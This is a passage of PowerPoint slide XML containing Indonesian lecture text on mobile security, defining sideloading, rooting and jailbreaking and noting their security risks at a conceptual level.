            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pembobolan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>serangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> brute force.</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175</a:t>
            </a:fld>
            <a:endParaRPr lang="en-ID"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="119751039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Sideload, Rooting, dan Jailbreaking</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seluler</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menghadirkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>unik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terkait</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengoperasiannya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lunak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>khusus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keberadaannya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di mana-mana, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kemampuannya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyimpan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengumpulkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pribadi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>profesional</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jumlah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>besar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Rooting dan jailbreaking </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>metode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>digunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendapatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>istimewa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tinggi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> file </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seluler</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Hal </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memungkinkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melewati</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>batasan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tertentu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diberlakukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> oleh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>produsen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>operasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>Rooting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Melibatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendapatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> root </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>administratif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Android </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memodifikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> file </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menginstal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> ROM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>khusus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>versi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>operasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dimodifikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>), dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengakses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>fitur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengaturan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tersedia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>biasa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>Jailbreaking</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Menjelaskan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tentang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendapatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penuh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> iOS (iPhone </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> iPad) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menghapus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>batasan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diberlakukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> oleh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>operasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> iOS Apple. Jailbreaking </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memungkinkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menginstal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyesuaikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tampilan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perilaku</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengakses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> file </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melewati</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>batasan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diterapkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> oleh Apple.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Praktik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> "sideload" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengacu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penginstalan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sumber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>selain</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> toko </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>resmi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> platform, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Google Play Store </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Android </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> App Store Apple </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> iOS. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Meskipun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> sideload </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memungkinkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>fleksibilitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pilihan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lunak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>besar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menimbulkan</a:t>
